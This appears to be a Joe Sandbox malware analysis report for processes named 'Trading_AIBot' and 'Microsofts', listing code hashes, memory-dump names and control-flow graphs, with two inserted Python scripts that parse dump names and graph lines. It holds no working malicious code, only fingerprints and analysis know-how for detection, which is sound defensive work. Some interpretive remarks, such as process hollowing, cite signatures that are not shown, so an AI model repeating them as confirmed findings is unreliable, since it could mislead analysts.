• Opcode ID: 20d4b79e1578c0cb0dcb7a5a2874f97c8c29871b7b34610c730e0bbbfdcd020a
• Instruction ID: 10a206640330fdee4f4ce88530b20cad7c19847b3cc7f5d6f0eafab0178a9900
• Opcode Fuzzy Hash: 20d4b79e1578c0cb0dcb7a5a2874f97c8c29871b7b34610c730e0bbbfdcd020a
• Instruction Fuzzy Hash: 5F311470E012498FCB05DBB4C9919EEBBB2BF8A304F2084AAD415BB794CB355D42CF64
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13b107652be3739783f7365a653be151008d40b65902e0d9291e4cccf98a6588
• Instruction ID: 6754fa526026f59c9cb56eb803e077d03070d883b63bd020940c62ec27ee5fac
• Opcode Fuzzy Hash: 13b107652be3739783f7365a653be151008d40b65902e0d9291e4cccf98a6588
• Instruction Fuzzy Hash: C121F470E012098FCB08DFA5D9419EEB7B2BF89305F609469D515B7394CB365D41CF64
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1afce4527d752122e427dba87559a3d8046cb5c8ed885d38807ea22ff7ad1f11
• Instruction ID: 3bc5e85f8e337be49769e9442ba2cf8d158a2998206cd9724a007a4358a98df9
• Opcode Fuzzy Hash: 1afce4527d752122e427dba87559a3d8046cb5c8ed885d38807ea22ff7ad1f11
• Instruction Fuzzy Hash: 07216A719093859FC7029FB4D8593EE7FB0EF47311F0848DAC081A72A2C7780695EB51
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21088025945a4878899186a75c827642fa327e4b0b882fcf632166cb07a179b7
• Instruction ID: 64c2f8b73aed7a5ceed9963186839495fa621d202a3d34f43d6f3c08c984c575
• Opcode Fuzzy Hash: 21088025945a4878899186a75c827642fa327e4b0b882fcf632166cb07a179b7
• Instruction Fuzzy Hash: CF012875D05319DFDB04EFB4D5583EEBBB0EF46312F0098AA9415A3290DB780A84EFA1
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f769e489d3cfc0487881ad7cfd63d9a76df09a5a367bc48aa3e8c83656083093
• Instruction ID: f74a7a7c64a1c81376b8471385c7a748604d7dc3b1d6453d7f64d18771e319ad
• Opcode Fuzzy Hash: f769e489d3cfc0487881ad7cfd63d9a76df09a5a367bc48aa3e8c83656083093
• Instruction Fuzzy Hash: 88F0BEB48052849FC702EFB8D695AA87FB0EF0B210F1040DAD848E7762C7304D83CB00
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                      • Opcode ID: 32b2b1fe1dc77e2b8f2f23bc58270bd7ffc75ec50d4166bc75552c3af2a79a47
                                                                                                                                      • Instruction ID: a3f1362cddbb37c07c239b8c21fc46f601b8070a3d7ef9e444abddd7cdf050dc
                                                                                                                                      • Opcode Fuzzy Hash: 32b2b1fe1dc77e2b8f2f23bc58270bd7ffc75ec50d4166bc75552c3af2a79a47
                                                                                                                                      • Instruction Fuzzy Hash: D1F0F878D44155CFCB64DFA4E5586ACBBB0EF4A312F0064A6D44AE3260CB3099C5DF64
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 177a1cde5f67287e9fa18ff2bd52e829d8608e9bd68d1eb9c19fc8d97ed181ae
                                                                                                                                      • Instruction ID: 17fc2057aed0cf88e9fc2803b9fdd0d82b6ab668bcd0df412210af2a1622bde9
                                                                                                                                      • Opcode Fuzzy Hash: 177a1cde5f67287e9fa18ff2bd52e829d8608e9bd68d1eb9c19fc8d97ed181ae
                                                                                                                                      • Instruction Fuzzy Hash: A9E0223090128ACFD705DF60E6A57DD7B78EF16304F00418A984957A92CB351F40EB61
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2d23ed2f699f0d8b49bef4412443bd3ad2b9e5c0471cbe257286ec885a1be3d2
                                                                                                                                      • Instruction ID: d5c09da4b48e86082a128f28e85537281bf70b64ccbbde2f4f54f45f6c88d160
                                                                                                                                      • Opcode Fuzzy Hash: 2d23ed2f699f0d8b49bef4412443bd3ad2b9e5c0471cbe257286ec885a1be3d2
                                                                                                                                      • Instruction Fuzzy Hash: C3E01AB8D10208DFC744EF78EA88A59BBF4FB09315F1041AAD808D3361E7309D86DB90
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de37d8d8a6674577705528664f333139856941bc8044774a42c913570765f193
                                                                                                                                      • Instruction ID: f6b45d0ee23ebcdc673b100ab1676fa25fbb4b5236c1f3e85f898db16c0140be
                                                                                                                                      • Opcode Fuzzy Hash: de37d8d8a6674577705528664f333139856941bc8044774a42c913570765f193
                                                                                                                                      • Instruction Fuzzy Hash: 1DE08671901208DFD700EFB8E65579DB7B9EB05305F108569D409D3251DB711E40E790
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 27554c07b22917ccbbcc14f6cb1ffa76c5d60781bf6a6a3f31cc5f0fe95778e1
                                                                                                                                      • Instruction ID: 2b801a699b9dbbad1ec03d9c44717c63c54991e9ea5279697980ae6578c2e372
                                                                                                                                      • Opcode Fuzzy Hash: 27554c07b22917ccbbcc14f6cb1ffa76c5d60781bf6a6a3f31cc5f0fe95778e1
                                                                                                                                      • Instruction Fuzzy Hash: 26D02B30D4D3C28FC7228B607884BA07F389F03211F0406C2D094865B283640499D366
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24b33cd2768f2c919270109cad3f56d99469878f5886cfa0cae62aa9f28ff847
                                                                                                                                      • Instruction ID: 4fae840a884947eb82df0758d40433010fd776b72119ddb560e99657ad24be9e
                                                                                                                                      • Opcode Fuzzy Hash: 24b33cd2768f2c919270109cad3f56d99469878f5886cfa0cae62aa9f28ff847
                                                                                                                                      • Instruction Fuzzy Hash: F1C01271C453089BD2109FA5A804769767CEF02622F100158A5189225097714590A6A9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 02517d86dfa6e5a199661b4369ce5fa3f3421d4e0fd3f32055a5845f2b26036b
                                                                                                                                      • Instruction ID: 5d4f2cab1dae2890f11c9eca252a41c9f27a8d2360719c115c21a0b6a72003dc
                                                                                                                                      • Opcode Fuzzy Hash: 02517d86dfa6e5a199661b4369ce5fa3f3421d4e0fd3f32055a5845f2b26036b
                                                                                                                                      • Instruction Fuzzy Hash: DFC08071D4534CDBD314DF94B404B65B77CD703312F400158D518D3200D77144D0E6B5
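Every record above cites a dump file such as `0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp` together with the IDA snapshot `hcaresult_12_2_f10000_Trading_AIBot.jbxd`. As an added example, not part of the Joe Sandbox report, the script below decodes that dump name and refuses to pair it with a snapshot whose PID, pass number or base address disagree. Only the PID and base address are corroborated by the page itself (they reappear in the snapshot name and in the `Offset:` value); reading the fifth and seventh fields as the Windows page protection (0x40 = PAGE_EXECUTE_READWRITE) and region type (0x20000 = MEM_PRIVATE) is an assumption of this example, made because it fits what `based on PE: false` and the unpacking and process-hollowing signatures describe: code running from writable private memory that no image on disk backs. Confirm the field layout against the vendor's documentation before relying on that reading.

```python
"""Decode a Joe Sandbox memory-dump (.sdmp) file name and cross-check it against the
IDA snapshot (.jbxd) name the same record cites. Only the PID and base address are
corroborated by the report; reading fields 5 and 7 as Windows page-protection and
region-type constants is an ASSUMPTION of this example."""
import re
from dataclasses import dataclass

# winnt.h constants, used only to label the assumed protection / region-type fields.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(r"^([0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp$")     # eight dotted hex fields
JBXD_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")  # hcaresult_<pid>_<pass>_<base>_<process>

@dataclass(frozen=True)
class DumpRegion:
    pid: int          # field 1; matches <pid> in the snapshot name
    pass_no: int      # field 2; matches <pass> in the snapshot name
    base: int         # field 4; matches "Offset:" in the record
    protect: int      # field 5; ASSUMED to be the PAGE_* protection at dump time
    mem_type: int     # field 7; ASSUMED to be the MEM_* region type
    raw: tuple        # all eight fields as written, for the ones not decoded here

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def is_rwx_private(self) -> bool:
        """Writable+executable memory with no image behind it: the shape unpacked or
        injected code leaves, consistent with "based on PE: false" in the record."""
        return (self.protect & 0xFF) == 0x40 and self.mem_type == 0x20000

def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    f = tuple(m.group(1).split("."))
    return DumpRegion(int(f[0], 16), int(f[1], 16), int(f[3], 16), int(f[4], 16), int(f[6], 16), f)

def parse_jbxd_name(name: str) -> tuple[int, int, int, str]:
    m = JBXD_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .jbxd snapshot name: {name}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3), 16), m.group(4)

def cross_check(sdmp_name: str, jbxd_name: str) -> DumpRegion:
    """Refuse to pair a dump with a snapshot whose PID, pass or base address differs."""
    region = parse_sdmp_name(sdmp_name)
    pid, pass_no, base, _process = parse_jbxd_name(jbxd_name)
    if (pid, pass_no, base) != (region.pid, region.pass_no, region.base):
        raise ValueError(f"{sdmp_name} and {jbxd_name} describe different regions")
    return region

# Sample pair copied from the process-12 records above.
SAMPLE_SDMP = "0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp"
SAMPLE_JBXD = "hcaresult_12_2_f10000_Trading_AIBot.jbxd"

if __name__ == "__main__":
    r = cross_check(SAMPLE_SDMP, SAMPLE_JBXD)
    print(f"pid={r.pid} pass={r.pass_no} base=0x{r.base:x} protect={r.protect_name} "
          f"type={r.mem_type_name} rwx_private={r.is_rwx_private}")
```

The cross-check matters when dumps from several processes sit in one report, as here (process 12, `Trading_AIBot`, and process 13, `Microsofts`): pairing the wrong snapshot with a dump silently attributes one process's code to another.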

                                                                                                                                      Execution Graph

Execution Coverage: 10.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 2
Total number of Limit Nodes: 0
                                                                                                                                      execution_graph 23693 51ca820 DuplicateHandle 23694 51ca8b6 23693->23694
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N
                                                                                                                                      • API String ID: 0-1130791706
                                                                                                                                      • Opcode ID: 081a0c056fa247555ba8076ea3cd8fa85ac2994c38a70f4c45ff84bb371c9e32
                                                                                                                                      • Instruction ID: 443059f95ae65837ceca2b0f0645ff43ba18fe9a5e7f2ca5a2f3044d66c9281d
                                                                                                                                      • Opcode Fuzzy Hash: 081a0c056fa247555ba8076ea3cd8fa85ac2994c38a70f4c45ff84bb371c9e32
                                                                                                                                      • Instruction Fuzzy Hash: 9E73D531D1075A8ADB11EF68C844AE9FBB1FF95300F55C6DAE45867221EB70AAC4CF81

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 1540 bb2dd1-bb2ded 1541 bb2def-bb2df1 1540->1541 1542 bb2df6-bb2e06 1540->1542 1543 bb3094-bb309b 1541->1543 1544 bb2e08 1542->1544 1545 bb2e0d-bb2e1d 1542->1545 1544->1543 1547 bb307b-bb3089 1545->1547 1548 bb2e23-bb2e31 1545->1548 1551 bb309c-bb3182 1547->1551 1553 bb308b-bb308f call bb02a8 1547->1553 1548->1551 1552 bb2e37 1548->1552 1622 bb3189-bb32ac call bb16c8 call bb16d8 call bb16e8 call bb16f8 call bb02c4 1551->1622 1623 bb3184 1551->1623 1552->1551 1554 bb2e7b-bb2e9d 1552->1554 1555 bb2f3a-bb2f62 1552->1555 1556 bb2e3e-bb2e50 1552->1556 1557 bb2fd6-bb2ffc 1552->1557 1558 bb2e55-bb2e76 1552->1558 1559 bb2f14-bb2f35 1552->1559 1560 bb2f94-bb2fd1 1552->1560 1561 bb2ec8-bb2ee9 1552->1561 1562 bb302f-bb304a call bb02b8 1552->1562 1563 bb306f-bb3079 1552->1563 1564 bb2eee-bb2f0f 1552->1564 1565 bb304c-bb306d call bb18c8 1552->1565 1566 bb2ea2-bb2ec3 1552->1566 1567 bb3001-bb302d 1552->1567 1568 bb2f67-bb2f8f 1552->1568 1553->1543 1554->1543 1555->1543 1556->1543 1557->1543 1558->1543 1559->1543 1560->1543 1561->1543 1562->1543 1563->1543 1564->1543 1565->1543 1566->1543 1567->1543 1568->1543 1641 bb32b2-bb32d6 1622->1641 1623->1622 1643 bb32d8-bb32e1 1641->1643 1644 bb32e2 1641->1644 1643->1644 1646 bb32e3 1644->1646 1646->1646
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fcc34c973122243e6314ca1e325b57bd317b07c50d1f5b8f94fcaf72de681fe4
                                                                                                                                      • Instruction ID: 5cf71918fff7d8fdc233a4691b27cc55f5977ec898de2fded0123aa5c47e2c47
                                                                                                                                      • Opcode Fuzzy Hash: fcc34c973122243e6314ca1e325b57bd317b07c50d1f5b8f94fcaf72de681fe4
                                                                                                                                      • Instruction Fuzzy Hash: AAE18C74F00248CFDB08EFB9D8A46AEBBF2BF89700B148569E406A7354DF749942CB51

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 1880 bb9480-bb94a0 1881 bb94a2 1880->1881 1882 bb94a7-bb9538 1880->1882 1881->1882 1886 bb953e-bb954e 1882->1886 1887 bb988c-bb98c0 1882->1887 1937 bb9551 call bb9a30 1886->1937 1938 bb9551 call bb9a40 1886->1938 1939 bb9551 call bb9d87 1886->1939 1891 bb9557-bb958a 1894 bb958c 1891->1894 1895 bb9591-bb959a 1891->1895 1894->1895 1896 bb987f-bb9885 1895->1896 1897 bb988b 1896->1897 1898 bb959f-bb95ab 1896->1898 1897->1887 1899 bb95b3-bb9619 1898->1899 1903 bb961f-bb968d call bb3760 1899->1903 1904 bb96d5-bb9730 1899->1904 1915 bb968f-bb96cf 1903->1915 1916 bb96d0-bb96d3 1903->1916 1914 bb9731-bb9781 1904->1914 1921 bb986a-bb9875 1914->1921 1922 bb9787-bb9869 1914->1922 1915->1916 1916->1914 1924 bb987c 1921->1924 1925 bb9877 1921->1925 1922->1921 1924->1896 1925->1924 1937->1891 1938->1891 1939->1891
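The `execution_graph` and `control_flow_graph` lines above are the sandbox's flattened serialisation of the graphs it draws: `<id> <addr>[-<addr>]` declares a node, optionally followed by `call <addr>` pairs or an API name, and `<id>-><id>` declares an edge. The parser below is an added example, not Joe Sandbox code; the grammar is inferred from the lines on this page rather than taken from documentation. It rebuilds nodes and edges and reports the entry block, dead-end blocks, call targets and loop-closing edges, using the `execution_graph` line and an excerpt of the first `control_flow_graph` line as its sample input (same node ids and addresses; most of the sixteen `1552->` edges of the original are dropped to keep it short). On the excerpt it recovers the single entry block 1540, the join block 1543 that every case returns to, the eight call targets, and the self-loop `1646->1646` the graph ends in.

```python
"""Rebuild Joe Sandbox's flattened control_flow_graph / execution_graph lines into nodes and edges."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

NODE_RE = re.compile(r"^\d+$")             # "1540": node id, always followed by its address
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")    # "1540->1541": edge between two node ids

@dataclass
class Block:
    nid: int
    start: int
    end: int                                         # == start for single-address nodes
    calls: list[str] = field(default_factory=list)   # targets of `call` inside the block
    labels: list[str] = field(default_factory=list)  # API names the sandbox attached

@dataclass
class Graph:
    name: str
    blocks: dict[int, Block]
    edges: list[tuple[int, int]]

def parse_graph(line: str) -> Graph:
    tokens = line.split()
    name, tokens = tokens[0], tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:                                     # an edge closes the current node
            edges.append((int(edge.group(1)), int(edge.group(2))))
            cur, i = None, i + 1
        elif NODE_RE.match(tok):                     # "<id> <start>[-<end>]"
            start, _, end = tokens[i + 1].partition("-")
            cur = Block(int(tok), int(start, 16), int(end or start, 16))
            blocks[cur.nid] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"unexpected token {tok!r} outside a node")
        elif tok == "call":                          # "call <target>" inside the node
            cur.calls.append(tokens[i + 1])
            i += 2
        else:                                        # anything else is an API label
            cur.labels.append(tok)
            i += 1
    if any(a not in blocks or b not in blocks for a, b in edges):
        raise ValueError("an edge references an undeclared node")
    return Graph(name, blocks, edges)

def entry_blocks(g: Graph) -> list[int]:             # nothing jumps here: region entry points
    targets = {b for _, b in g.edges}
    return sorted(n for n in g.blocks if n not in targets)

def dead_end_blocks(g: Graph) -> list[int]:          # no successor: return, or disassembly stopped
    sources = {a for a, _ in g.edges}
    return sorted(n for n in g.blocks if n not in sources)

def call_targets(g: Graph) -> dict[str, list[int]]:
    """Map each called address to the blocks that call it."""
    out = defaultdict(list)
    for b in g.blocks.values():
        for t in b.calls:
            out[t].append(b.nid)
    return dict(out)

def back_edges(g: Graph, root: int) -> set[tuple[int, int]]:
    """Edges closing a cycle in a DFS from root (self-loops count): the loops to step through."""
    succ = defaultdict(list)
    for a, b in g.edges:
        succ[a].append(b)
    colour, found = {n: 0 for n in g.blocks}, set()  # 0 new, 1 on DFS stack, 2 done
    def visit(n: int) -> None:
        colour[n] = 1
        for s in succ[n]:
            if colour[s] == 1:
                found.add((n, s))
            elif colour[s] == 0:
                visit(s)
        colour[n] = 2
    visit(root)
    return found

# Sample input: the execution_graph line above and an excerpt of the first control_flow_graph line.
SAMPLE_EXEC = "execution_graph 23693 51ca820 DuplicateHandle 23694 51ca8b6 23693->23694"
SAMPLE_CFG = (
    "control_flow_graph 1540 bb2dd1-bb2ded 1541 bb2def-bb2df1 1540->1541 1542 bb2df6-bb2e06 1540->1542 "
    "1543 bb3094-bb309b 1541->1543 1544 bb2e08 1542->1544 1545 bb2e0d-bb2e1d 1542->1545 1544->1543 "
    "1547 bb307b-bb3089 1545->1547 1548 bb2e23-bb2e31 1545->1548 1551 bb309c-bb3182 1547->1551 "
    "1553 bb308b-bb308f call bb02a8 1547->1553 1548->1551 1552 bb2e37 1548->1552 1622 bb3189-bb32ac "
    "call bb16c8 call bb16d8 call bb16e8 call bb16f8 call bb02c4 1551->1622 1623 bb3184 1551->1623 "
    "1552->1551 1562 bb302f-bb304a call bb02b8 1552->1562 1565 bb304c-bb306d call bb18c8 1552->1565 "
    "1553->1543 1562->1543 1565->1543 1641 bb32b2-bb32d6 1622->1641 1623->1622 1643 bb32d8-bb32e1 "
    "1641->1643 1644 bb32e2 1641->1644 1643->1644 1646 bb32e3 1644->1646 1646->1646"
)

if __name__ == "__main__":
    g = parse_graph(SAMPLE_CFG)
    print(len(g.blocks), len(g.edges), entry_blocks(g), dead_end_blocks(g), sorted(call_targets(g)), back_edges(g, 1540))
```

The same parser reads the `execution_graph` line, where the node label is the API name the sandbox attached (`DuplicateHandle` at 0x51ca820) and the two nodes it reports match the `Total number of Nodes` figure above. In the full first graph the single-address block 1552 (0xbb2e37) fans out to sixteen successors that all converge on 1543, which is the shape a jump-table dispatch leaves in a control-flow graph.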
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 900dd3629dad2cefe8a090342f40bacc13a1c674b8f437919a34d24f2a222ff2
                                                                                                                                      • Instruction ID: 14f2464989460f84ad64791670cedcab59353ded82bb11b862646d5f909752dc
                                                                                                                                      • Opcode Fuzzy Hash: 900dd3629dad2cefe8a090342f40bacc13a1c674b8f437919a34d24f2a222ff2
                                                                                                                                      • Instruction Fuzzy Hash: 9FC19E78E01218CFDB15DFA5D994BADBBB2BF89300F2081AAD809A7355DB355E85CF10
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d289c90c5de7558101e0c3dd5f85c6519a891a50efbb8df94b9bdedfc8e40144
                                                                                                                                      • Instruction ID: c7828e8e791ec8b8365a2821684a4f8f71f1a55d09f599fbc51785c97ddd37c9
                                                                                                                                      • Opcode Fuzzy Hash: d289c90c5de7558101e0c3dd5f85c6519a891a50efbb8df94b9bdedfc8e40144
                                                                                                                                      • Instruction Fuzzy Hash: 1FA1F371D006198FDB14DFA9C8847EDFBB1EF89300F14C6AAE458A7261EB709A85CF41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61bf9986df05fe4671c3ce66118072700c331c2e9ec35ec48acf4f7f21a6f0f5
                                                                                                                                      • Instruction ID: e2c8d6668aaa88bfd407f474df41b520c0eb27fe36d7b29995d8860161b17dc0
                                                                                                                                      • Opcode Fuzzy Hash: 61bf9986df05fe4671c3ce66118072700c331c2e9ec35ec48acf4f7f21a6f0f5
                                                                                                                                      • Instruction Fuzzy Hash: 12A10770D00208CFEB14DFA9C9947EDBBB1FF89304F24826AE509A7291DB759985CF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4467a5909588345f7431c37e80eb5112568a7de5deccee2db35db44147041b3a
                                                                                                                                      • Instruction ID: 45be3e95518ce206283525a6b9a7359a0beedcf7b19b6b3c5f1bf1fc0fc06075
                                                                                                                                      • Opcode Fuzzy Hash: 4467a5909588345f7431c37e80eb5112568a7de5deccee2db35db44147041b3a
                                                                                                                                      • Instruction Fuzzy Hash: A7A10770D00208CFEB24DFA9C954BEDBBB1FF89304F20826AE508A7291DB749985CF55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0aa91a69acc566786c22ec31f68a0bc5858c310279f1575ed33d1096aa426b25
                                                                                                                                      • Instruction ID: 564ad992ad0707373012638ae780fc3939d8241f7be9c11703730508d42ce2e9
                                                                                                                                      • Opcode Fuzzy Hash: 0aa91a69acc566786c22ec31f68a0bc5858c310279f1575ed33d1096aa426b25
                                                                                                                                      • Instruction Fuzzy Hash: C491D474D00208CFEB10DFA9C9847ECBBB1FF49311F2482AAE509A7291DB759985CF55
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.4631135407.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_bb0000_Microsofts.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ee51fc37928548a1a70568bfb88b71fb843ed435c63fa8bbe7dc5f245b35c7a9
                                                                                                                                      • Instruction ID: 4f525219506934d0b98f881621f475b69cb4f2df6242e0aa458cb7c3282bb191
                                                                                                                                      • Opcode Fuzzy Hash: ee51fc37928548a1a70568bfb88b71fb843ed435c63fa8bbe7dc5f245b35c7a9
                                                                                                                                      • Instruction Fuzzy Hash: 3641E575D01208CBEB18DFA6D8546EDBBF2BF89300F24D12AD419AB255EB345946CF50

